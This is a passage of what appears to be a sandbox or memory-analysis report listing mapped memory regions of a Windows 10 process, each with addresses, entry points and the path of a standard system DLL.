"\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 8516 start_va = 0x7ffd9e220000 end_va = 0x7ffd9e296fff monitored = 0 entry_point = 0x7ffd9e222af0 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 8517 start_va = 0x7ffd9e300000 end_va = 0x7ffd9e30bfff monitored = 0 entry_point = 0x7ffd9e3014b0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 8518 start_va = 0x7ffd9e310000 end_va = 0x7ffd9e31cfff monitored = 0 entry_point = 0x7ffd9e311ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 8519 start_va = 0x7ffd9e320000 end_va = 0x7ffd9e37bfff monitored = 0 entry_point = 0x7ffd9e337190 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 8520 start_va = 0x7ffd9e380000 end_va = 0x7ffd9e416fff monitored = 0 entry_point = 0x7ffd9e38ddc0 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 8521 start_va = 0x7ffd9e420000 end_va = 0x7ffd9e46cfff monitored = 0 entry_point = 0x7ffd9e437de0 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 8522 start_va = 0x7ffd9e470000 end_va = 0x7ffd9e481fff monitored = 0 entry_point = 0x7ffd9e473580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 8523 start_va = 0x7ffd9e490000 end_va = 0x7ffd9e4b5fff monitored = 0 entry_point = 0x7ffd9e4a5cb0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 8524 start_va = 0x7ffd9e4c0000 end_va = 0x7ffd9e4eafff monitored = 0 entry_point = 0x7ffd9e4c4240 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 8525 start_va = 0x7ffd9e4f0000 end_va = 0x7ffd9e515fff monitored = 0 entry_point = 0x7ffd9e4f1cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8526 start_va = 0x7ffd9e520000 end_va = 0x7ffd9e5fafff monitored = 0 entry_point = 0x7ffd9e5328b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 8527 start_va = 0x7ffd9e600000 end_va = 0x7ffd9e685fff monitored = 0 entry_point = 0x7ffd9e621e10 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 8528 start_va = 0x7ffd9e690000 end_va = 0x7ffd9e769fff monitored = 0 entry_point = 0x7ffd9e6c3c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 8529 start_va = 0x7ffd9e770000 end_va = 0x7ffd9e88ffff monitored = 0 entry_point = 0x7ffd9e7a8310 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 8530 start_va = 0x7ffd9e890000 end_va = 0x7ffd9e923fff monitored = 0 entry_point = 0x7ffd9e8c9210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 8531 start_va = 0x7ffd9e930000 end_va = 0x7ffd9ebd2fff monitored = 0 entry_point = 0x7ffd9e956190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 8532 start_va = 0x7ffd9ed50000 end_va = 0x7ffd9ed5bfff monitored = 0 entry_point = 0x7ffd9ed518b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 8533 start_va = 0x7ffd9ed60000 end_va = 0x7ffd9edacfff monitored = 0 entry_point = 0x7ffd9ed6d180 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 8534 start_va = 0x7ffd9edb0000 end_va = 0x7ffd9f8bafff monitored = 0 entry_point = 0x7ffd9eefa540 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 8535 start_va = 0x7ffd9f8c0000 end_va = 0x7ffd9f90ffff monitored = 0 entry_point = 0x7ffd9f8c2580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 8536 start_va = 0x7ffd9f910000 end_va = 0x7ffd9fdaffff monitored = 0 entry_point = 0x7ffd9f9a8740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 8537 start_va = 0x7ffd9fdb0000 end_va = 0x7ffd9fdf9fff monitored = 0 entry_point = 0x7ffd9fdb5800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 8538 start_va = 0x7ffd9fe20000 end_va = 0x7ffd9fe89fff monitored = 0 entry_point = 0x7ffd9fe35e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 8539 start_va = 0x7ffd9fe90000 end_va = 0x7ffd9fef4fff monitored = 0 entry_point = 0x7ffd9fe94c50 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 8540 start_va = 0x7ffd9ff00000 end_va = 0x7ffda0173fff monitored = 0 entry_point = 0x7ffd9ff70400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 8541 start_va = 0x7ffda0180000 end_va = 0x7ffda0194fff monitored = 0 entry_point = 0x7ffda0182c90 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 8542 start_va = 0x7ffda01a0000 end_va = 0x7ffda0250fff monitored = 0 entry_point = 0x7ffda01b08f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 8543 start_va = 0x7ffda0270000 end_va = 0x7ffda029afff monitored = 0 entry_point = 0x7ffda027c3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 8544 start_va = 0x7ffda02a0000 end_va = 0x7ffda03acfff monitored = 0 entry_point = 0x7ffda02cf420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 8545 start_va = 0x7ffda0430000 end_va = 0x7ffda048efff monitored = 0 entry_point = 0x7ffda045bce0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 8546 start_va = 0x7ffda0660000 end_va = 0x7ffda0674fff monitored = 0 entry_point = 0x7ffda0661ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 8547 start_va = 0x7ffda07b0000 end_va = 0x7ffda07b9fff monitored = 0 entry_point = 0x7ffda07b14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 8548 start_va = 0x7ffda07c0000 end_va = 0x7ffda088dfff monitored = 0 entry_point = 0x7ffda07f14c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 8549 start_va = 0x7ffda0890000 end_va = 0x7ffda0988fff monitored = 0 entry_point = 0x7ffda08d8000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 8550 start_va = 0x7ffda0a40000 end_va = 0x7ffda0c9cfff monitored = 0 entry_point = 0x7ffda0ac8610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 8551 start_va = 0x7ffda0f30000 end_va = 0x7ffda0f7afff monitored = 0 entry_point = 0x7ffda0f47b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 8552 start_va = 0x7ffda1060000 end_va = 0x7ffda10dffff monitored = 0 entry_point = 0x7ffda108d280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 8553 start_va = 0x7ffda1120000 end_va = 0x7ffda13a7fff monitored = 0 entry_point = 0x7ffda117f670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 8554 start_va = 0x7ffda13b0000 end_va = 0x7ffda13c4fff monitored = 0 entry_point = 0x7ffda13b2dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 8555 start_va = 0x7ffda1530000 end_va = 0x7ffda153dfff monitored = 0 entry_point = 0x7ffda1531460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 8556 start_va = 0x7ffda18d0000 end_va = 0x7ffda1936fff monitored = 0 entry_point = 0x7ffda18d63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 8557 start_va = 0x7ffda1a30000 end_va = 0x7ffda1a3afff monitored = 0 entry_point = 0x7ffda1a31d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8558 start_va = 0x7ffda1aa0000 end_va = 0x7ffda1b4dfff monitored = 0 entry_point = 0x7ffda1ab80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 8559 start_va = 0x7ffda1c30000 end_va = 0x7ffda1c49fff monitored = 0 entry_point = 0x7ffda1c32430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 8560 start_va = 0x7ffda1c50000 end_va = 0x7ffda1c65fff monitored = 0 entry_point = 0x7ffda1c519f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 8561 start_va = 0x7ffda1d90000 end_va = 0x7ffda1de4fff monitored = 0 entry_point = 0x7ffda1d93fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 8562 start_va = 0x7ffda1e50000 end_va = 0x7ffda1e87fff monitored = 0 entry_point = 0x7ffda1e68cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8563 start_va = 0x7ffda1f30000 end_va = 0x7ffda1f70fff monitored = 0 entry_point = 0x7ffda1f34840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 8564 start_va = 0x7ffda2120000 end_va = 0x7ffda2147fff monitored = 0 entry_point = 0x7ffda2128c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 8565 start_va = 0x7ffda2150000 end_va = 0x7ffda2217fff monitored = 0 entry_point = 0x7ffda21913f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 8566 start_va = 0x7ffda2220000 end_va = 0x7ffda2280fff monitored = 0 entry_point = 0x7ffda2224b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 8567 start_va = 0x7ffda2a20000 end_va = 0x7ffda2a42fff monitored = 0 entry_point = 0x7ffda2a299a0 region_type = mapped_file name = "networkstatus.dll" filename = "\\Windows\\System32\\NetworkStatus.dll" (normalized: "c:\\windows\\system32\\networkstatus.dll") Region: id = 8568 start_va = 0x7ffda2c30000 end_va = 0x7ffda2c9ffff monitored = 0 entry_point = 0x7ffda2c52960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 8569 start_va = 0x7ffda2cf0000 end_va = 0x7ffda2d08fff monitored = 0 entry_point = 0x7ffda2cf4520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8570 start_va = 0x7ffda31d0000 end_va = 0x7ffda3270fff monitored = 0 entry_point = 0x7ffda31d3db0 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 8571 start_va = 0x7ffda32a0000 end_va = 0x7ffda345cfff monitored = 0 entry_point = 0x7ffda32caf90 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 8572 start_va = 0x7ffda3460000 end_va = 0x7ffda37e1fff monitored = 0 entry_point = 0x7ffda34b1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 8573 start_va = 0x7ffda37f0000 end_va = 0x7ffda3925fff monitored = 0 entry_point = 0x7ffda381f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 8574 start_va = 0x7ffda4970000 end_va = 0x7ffda4a18fff monitored = 0 entry_point = 0x7ffda4999010 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 8575 start_va = 0x7ffda4a20000 end_va = 0x7ffda4b2dfff monitored = 0 entry_point = 0x7ffda4a6eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 8576 start_va = 0x7ffda4b30000 end_va = 0x7ffda4b99fff monitored = 0 entry_point = 0x7ffda4b39d60 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 8577 start_va = 0x7ffda4c00000 end_va = 0x7ffda4c97fff monitored = 0 entry_point = 0x7ffda4c23980 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 8578 start_va = 0x7ffda4ca0000 end_va = 0x7ffda4d3ffff monitored = 0 entry_point = 0x7ffda4cc56b0 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 8579 start_va = 0x7ffda4d40000 end_va = 0x7ffda4dc1fff monitored = 0 entry_point = 0x7ffda4d44ef0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 8580 start_va = 0x7ffda4dd0000 end_va = 0x7ffda4e2cfff monitored = 0 entry_point = 0x7ffda4dd6c90 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 8581 start_va = 0x7ffda4fd0000 end_va = 0x7ffda4fe5fff monitored = 0 entry_point = 0x7ffda4fd1b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8582 start_va = 0x7ffda5050000 end_va = 0x7ffda50e1fff monitored = 0 entry_point = 0x7ffda509a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 8583 start_va = 0x7ffda5180000 end_va = 0x7ffda51f9fff monitored = 0 entry_point = 0x7ffda51a7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 8584 start_va = 0x7ffda52d0000 end_va = 0x7ffda52edfff monitored = 0 entry_point = 0x7ffda52def80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 8585 start_va = 0x7ffda52f0000 end_va = 0x7ffda5300fff monitored = 0 entry_point = 0x7ffda52f3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 8586 start_va = 0x7ffda5460000 end_va = 0x7ffda54c3fff monitored = 0 entry_point = 0x7ffda5475ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 8587 start_va = 0x7ffda57c0000 end_va = 0x7ffda5d04fff monitored = 0 entry_point = 0x7ffda595a450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 8588 start_va = 0x7ffda5d10000 end_va = 0x7ffda5f7efff monitored = 0 entry_point = 0x7ffda5dc22b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 8589 start_va = 0x7ffda61e0000 end_va = 0x7ffda622afff monitored = 0 entry_point = 0x7ffda61f72b0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 8590 start_va = 0x7ffda6230000 end_va = 0x7ffda63e0fff monitored = 0 entry_point = 0x7ffda62c61a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 8591 start_va = 0x7ffda63f0000 end_va = 0x7ffda6491fff monitored = 0 entry_point = 0x7ffda6410a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 8592 start_va = 0x7ffda64a0000 end_va = 0x7ffda6747fff monitored = 0 entry_point = 0x7ffda6533250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 8593 start_va = 0x7ffda6750000 end_va = 0x7ffda6771fff monitored = 0 entry_point = 0x7ffda6751a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 8594 start_va = 0x7ffda67b0000 end_va = 0x7ffda686dfff monitored = 0 entry_point = 0x7ffda67f2d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 8595 start_va = 0x7ffda6870000 end_va = 0x7ffda6952fff monitored = 0 entry_point = 0x7ffda68a7da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 8596 start_va = 0x7ffda6d40000 end_va = 0x7ffda6db8fff monitored = 0 entry_point = 0x7ffda6d5fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 8597 start_va = 0x7ffda6dc0000 end_va = 0x7ffda6dfbfff monitored = 0 entry_point = 0x7ffda6dc25e0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 8598 start_va = 0x7ffda6e00000 end_va = 0x7ffda6ec5fff monitored = 0 entry_point = 0x7ffda6e03ac0 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 8599 start_va = 0x7ffda6f10000 end_va = 0x7ffda6f60fff monitored = 0 entry_point = 0x7ffda6f125e0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 8600 start_va = 0x7ffda6f70000 end_va = 0x7ffda7402fff monitored = 0 entry_point = 0x7ffda6f7f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 8601 start_va = 0x7ffda7410000 end_va = 0x7ffda7476fff monitored = 0 entry_point = 0x7ffda742e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 8602 start_va = 0x7ffda7480000 end_va = 0x7ffda74cefff monitored = 0 entry_point = 0x7ffda7487ab0 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 8603 start_va = 0x7ffda74d0000 end_va = 0x7ffda7655fff monitored = 0 entry_point = 0x7ffda751d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 8604 start_va = 0x7ffda7660000 end_va = 0x7ffda767bfff monitored = 0 entry_point = 0x7ffda76637a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8605 start_va = 0x7ffda7680000 end_va = 0x7ffda76b1fff monitored = 0 entry_point = 0x7ffda768b0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 8606 start_va = 0x7ffda76c0000 end_va = 0x7ffda76d2fff monitored = 0 entry_point = 0x7ffda76c2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 8607 start_va = 0x7ffda76e0000 end_va = 0x7ffda7704fff monitored = 0 entry_point = 0x7ffda76e2300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 8608 start_va = 0x7ffda7740000 end_va = 0x7ffda7764fff monitored = 0 entry_point = 0x7ffda7755220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 8609 start_va = 0x7ffda7790000 end_va = 0x7ffda77cffff monitored = 0 entry_point = 0x7ffda77a3750 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 8610 start_va = 0x7ffda77d0000 end_va = 0x7ffda7802fff monitored = 0 entry_point = 0x7ffda77d3800 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 8611 start_va = 0x7ffda7810000 end_va = 0x7ffda7824fff monitored = 0 entry_point = 0x7ffda7812850 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 8612 start_va = 0x7ffda7850000 end_va = 0x7ffda78e5fff monitored = 0 entry_point = 0x7ffda7875570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 8613 start_va = 0x7ffda7910000 end_va = 0x7ffda7936fff monitored = 0 entry_point = 0x7ffda7917940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 8614 start_va = 0x7ffda7940000 end_va = 0x7ffda79e9fff monitored = 0 entry_point = 0x7ffda7967910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 8615 start_va = 0x7ffda79f0000 end_va = 0x7ffda7aeffff monitored = 0 entry_point = 0x7ffda7a30f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 8616 start_va = 0x7ffda7c90000 end_va = 0x7ffda7cb9fff monitored = 0 entry_point = 0x7ffda7c98b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 8617 start_va = 0x7ffda8070000 end_va = 0x7ffda8163fff monitored = 0 entry_point = 0x7ffda807a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 8618 start_va = 0x7ffda8240000 end_va = 0x7ffda8295fff monitored = 0 entry_point = 0x7ffda8250bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 8619 start_va = 0x7ffda8340000 end_va = 0x7ffda834bfff monitored = 0 entry_point = 0x7ffda83427e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8620 start_va = 0x7ffda8420000 end_va = 0x7ffda8450fff monitored = 0 entry_point = 0x7ffda8427d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 8621 start_va = 0x7ffda8480000 end_va = 0x7ffda84f9fff monitored = 0 entry_point = 0x7ffda84a1a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 8622 start_va = 0x7ffda8580000 end_va = 